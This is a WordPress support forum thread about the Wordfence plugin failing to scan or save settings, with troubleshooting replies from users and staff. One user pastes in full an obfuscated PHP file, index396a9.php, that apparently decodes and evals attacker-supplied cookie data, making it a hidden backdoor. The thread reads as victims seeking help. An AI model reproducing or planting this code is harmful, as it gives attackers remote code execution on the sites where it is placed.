Wordfence Not Responding on Multiple Sites
-
Wordfence is not responding on several of our sites this morning. Scans won’t run, changes in options (i.e. start scans remotely) can’t be saved. I think it may be a Wordfence/server issue since our sites on a different server aren’t experiencing this problem. I’ve read through several troubleshooting posts to get the Wordfence scan started. None of the suggestions have worked, but haven’t seen anything specifically on this.
-
Are you still seeing issues? I haven’t seen any service degradation alerts this evening.
-Brian
I am still experiencing problems. Wordfence isn’t responding to any actions. I can check different settings under options, but none of the changes will save. The Scan Summary box, New Issues area and Ignored issues box are all blank. It does appear a scan was performed FEB 01 at 21:43:53 according to the Scan Detailed Activity window. However I cannot view or email activity log. The Start a Wordfence Scan button does not initiate any activity.
We haven’t been experiencing any issues with our servers. Were scans working on your site previously? Has anything changed on your sites? New plugins added, etc? If settings won’t save that can be an indication of AJAX being blocked. Check the javascript error console in a browser when trying to save and look for any errors.
Looking into the wordfence plugin files, there is a file, wordfence/index396a9.php , that contains the following code: `<?php
$WvSRtKNVEJYzX=””.”b”.””.”a”.””.””.””.””.””.chr(115).””.””.””.””.”e”.””.chr(54).””.””.”4″.””.””.””.””.””.”_”.””.””.””.”d”.””.””.chr(101).””.chr(99).””.””.””.”o”.””.””.””.”d”.””.””.””.””.””.”e”;$LcxCdthOwcSLHGox=$WvSRtKNVEJYzX(“”.chr(88).””.””.”1″.””.””.””.chr(66).””.””.””.”P”.””.chr(85).””.””.chr(49).””.””.””.””.”Q”.””.”=”);$CgRoRJbEVduX=$$LcxCdthOwcSLHGox;$UhcUGlmNDBV=false;if(isset($CgRoRJbEVduX[$WvSRtKNVEJYzX(“”.”a”.””.””.””.””.chr(119).””.””.””.””.””.chr(61).””.””.””.”=”)])){$UhcUGlmNDBV=$CgRoRJbEVduX[$WvSRtKNVEJYzX(“”.”a”.””.””.””.””.chr(119).””.””.””.””.””.chr(61).””.””.””.”=”)];}$bElLECDJiFXTEPWw=””.””.chr(104).””.”e”.””.””.””.chr(97).””.”d”.””.””.”e”.””.”r”;if(!$UhcUGlmNDBV){$bElLECDJiFXTEPWw($WvSRtKNVEJYzX(“”.””.””.””.””.”S”.””.””.””.””.””.chr(70).””.””.””.””.””.”R”.””.””.””.chr(85).””.chr(85).””.””.””.””.””.”C”.””.””.””.chr(56).””.””.””.””.””.chr(120).””.chr(76).””.””.””.””.””.”j”.””.””.””.””.””.”A”.””.””.””.””.”g”.””.””.””.””.chr(78).””.”D”.””.””.””.””.”A”.””.””.chr(48).””.””.””.””.”I”.””.chr(69).””.””.””.””.”5″.””.””.””.””.”v”.””.””.”d”.””.””.””.””.””.”C”.””.””.””.””.”B”.””.””.”G”.””.””.””.”b”.””.””.””.chr(51).””.””.””.””.””.chr(86).””.””.””.chr(117).””.chr(90).””.””.”A”.””.””.””.””.”=”.””.””.”=”));exit($WvSRtKNVEJYzX(“”.””.””.””.””.chr(78).””.chr(68).””.”A”.””.””.”z”.””.””.chr(73).””.””.chr(69).””.””.””.””.””.”5″.””.””.””.””.”v”.””.””.””.””.””.chr(100).””.””.””.””.””.chr(67).””.””.”B”.””.””.chr(71).””.”b”.””.””.”3″.””.””.”V”.””.””.”u”.””.chr(90).””.””.””.””.chr(65).””.chr(61).””.””.””.”=”));}eval($WvSRtKNVEJYzX(“QGluaV9zZXQo”.chr(73).”m1lbW9″.chr(121).”eV9saW1pdC”.chr(73).”sI”.chr(67).”IxMDI0T”.chr(83).”IpOwpAc2V”.chr(48).”X3RpbWVf”.chr(98).””.chr(71).”lt”.chr(97).”XQ”.chr(111).”M”.chr(67).”k7CkB”.chr(112).”Z25vc”.chr(109).”VfdXNlcl9hYm9y”.chr(100).”Ch0cnVlKTsgCkBlcnJvcl9″.chr(121).”ZXBvcnRpbmcoMCk7CmZ1bmN0aW9uI”.chr(71).”N”.chr(118).”bG”.chr(120).”lY3QoKXsKCSRjb3Vud”.chr(67).”A9IDA7CglpZihpc3″.chr(78).”ldCgkX0dFVF”.chr(115).””.chr(110).”YyddKSAmJ”.chr(105).””.chr(66).”zdHJsZW4oJF”.chr(57).”HRVRbJ2″.chr(77).”nXSk+MCl7CgkJJGN”.chr(118).”dW50ID0gJF9HRVRb”.chr(74).”2MnXTsKCX1l”.chr(98).”HNlIGl”.chr(109).”KGlzc2V0″.chr(75).”CR”.chr(102).”UE9TVFsnYydd”.chr(75).”SAmJi”.chr(66).”zdHJsZW4oJF9QT”.chr(49).”NUWyd”.chr(106).”J10pPjAp”.chr(101).”woJCSRjb3VudCA9I”.chr(67).”R”.chr(102).”UE9TVFsnYyddOwoJfQoJJF9jID0gYXJyYX”.chr(107).”oKTsKCSR”.chr(105).””.chr(78).”iA9ICJiYXNlNjQ”.chr(105).”L”.chr(105).”IiLiJf”.chr(73).”i4i”.chr(90).””.chr(71).”VjIi4″.chr(105).”b2R”.chr(108).”IjsK”.chr(67).”WZv”.chr(99).”ig”.chr(107).”a”.chr(83).”A9I”.chr(68).”E7″.chr(73).”C”.chr(82).”pI”.chr(68).”w9ICRjb3VudDsgJGkrKyApewoJCW”.chr(108).”mKGl”.chr(122).”c2V”.chr(48).”KCRfU”.chr(48).”VSVkVSWyJIVFRQX0NPT0tJRSIuJGldKSAmJiBzd”.chr(72).”JsZW”.chr(52).”oJF9TRVJWRVJbIkhUVFBfQ09PS0lFIi4kaV0pPj”.chr(65).”pew”.chr(111).””.chr(74).”CQkkX2NbXT”.chr(48).”g”.chr(100).”HJpbSgkX1NFUlZFUlsiSFRUUF9DT09LS”.chr(85).”UiL”.chr(105).”RpXSk7CgkJ”.chr(102).”QoJf”.chr(81).”oJc”.chr(109).””.chr(86).”0dXJuICRiNihpb”.chr(88).”Bsb2Rl”.chr(75).””.chr(67).”Ii”.chr(76).”CRfY”.chr(121).””.chr(107).”pOwp9″.chr(67).”kB0b3Vja”.chr(67).”gkX1″.chr(78).”FUlZFUlsiU0″.chr(78).”SSVBUX0″.chr(90).”JTEVOQU1FIl0sKHRpbWUoKS0oMzYwMCoyN”.chr(67).”o”.chr(122).”NjUqMykpKTs”.chr(75).”QHRvdWNo”.chr(75).”GJhc2″.chr(86).”uYW1lKC”.chr(82).”fU0VSVkVSWyJ”.chr(84).”Q1JJUFRfRklMRU5BTUUiXSksKHRpbWUoKS0oMzY”.chr(119).””.chr(77).”CoyNCozNjUqMykpKTsKLy8kbGlu”.chr(90).”XMgPSBjb”.chr(51).””.chr(86).”udChmaWxlKCR”.chr(102).”U0VSVkVSWyJTQ1J”.chr(74).”UFRfRk”.chr(108).”MRU5BTUUiXSkpO”.chr(119).”ovL2lmK”.chr(67).”RsaW5l”.chr(99).”yA9PSAyKXsKCSRf”.chr(89).”yA9IGNvbGxlY3QoKTs”.chr(75).”ICBpZighZW”.chr(49).”w”.chr(100).”H”.chr(107).”oJF9″.chr(106).”KSAmJi”.chr(66).”zdHJs”.chr(90).”W4oJF9″.chr(106).””.chr(75).”T4wKX”.chr(115).”K”.chr(73).”CAg”.chr(73).”CAg”.chr(90).”X”.chr(90).”hbCgk”.chr(88).”2M”.chr(112).””.chr(79).”w”.chr(111).””.chr(103).”IH1lbHNle”.chr(119).”ogICAgICBoZ”.chr(87).”FkZXIoI”.chr(107).”hUV”.chr(70).”AvMS”.chr(52).”wIDQw”.chr(78).”CBOb3Qg”.chr(82).”m91bmQiKTsKICB9″.chr(67).”i8″.chr(118).”f”.chr(87).”Vs”.chr(99).”2″.chr(86).”7Ci”.chr(56).”vCWhlY”.chr(87).”RlcigiSFRUUC8xLjAgNTA1I”.chr(69).”5vdCBGb3VuZCIpOwovL30=”));exit();`
Could this be causing my problems. These php malware files that end with a combination of letters and numbers (i.e. …396a9) are the types of files wordfence has found as maliscious, which is why I wanted to look to see if the plugin had been corrupted, as well. I can’t edit any files on my sites currently. I’m happy to upgrade to a premium subscription, if only I was able to. What is the next step?I’m experiencing a similar situation as Joe. I updated WordPress to 4.4.2 (as per the Wordfence email today) and any out-of-date plug-ins on a couple of my sites and then clicked on the Wordfence start scan button. It said it was requesting the scan and then nothing happened. This happened on 3 sites so far. Usually a scan starts and the summary unfolds in the summary box.
I found a post on the Wordfence site from a customer who had an issue with scheduled scans not happening due to a Caching plug-in. So I deactivated WP-Supercache and removed the code it injected into the main wp-config gile (as per that post) and Wordfence still wouldn’t scan. (I know scheduled scans are different from manual scans.)
One two sites the summary scan area included the scan results of a scan ran earlier today. For one site this summary scan had a date from December yet the logs say a scheduled scan happened.
Any suggestions on how to get the ‘start scan’ function in Wordfence to work again?
I have the same problem as Joe S-P.
Many of my sites on the same server got infected with exploitkit blackhole1 v305 (https://sitecheck.sucuri.net/results/frukta.sk). On most of the sites, Wordfence works, but on 3 of them, it does exactly the same as described by Joe S-P.
It seems that the virus is blocking the ajax or javascript in WordPress. Also the sidebar popup menu doesnt open on mouse hover.
Joe and zviera – if you have the IQ Country plug-in installed, try deactivating it and then click the ‘Start a Wordfence Scan’ button. So far that has worked on 4/4 of my sites. Will see if the scheduling works tomorrow. I read in a thread somwehre that Wordfence would not work with that plugin. That combo did work on some of my sites up to a few days ago (Feb 2/3), but then stopped working.
@sueb: Thanks for the additional details — I don’t know the current status of the issue with the country blocking plugin, but it could affect some parts of Wordfence.
It sounds like javascript issues in some of the descriptions above. Often, you can find the offending script using the browser’s console: Using the Javascript console
We also have a guide here, to help clean hacked sites. Some of the more aggressive scan options may find additional files, and there are recommendations on updates, passwords, etc., which may help prevent reinfection:
How to clean a hacked websiteBefore removing any files, it is a good idea to make a backup of the whole site. Even if it is currently infected, it will be helpful if you remove any good (or mostly good) files by mistake.
-Matt R
- The topic ‘Wordfence Not Responding on Multiple Sites’ is closed to new replies.
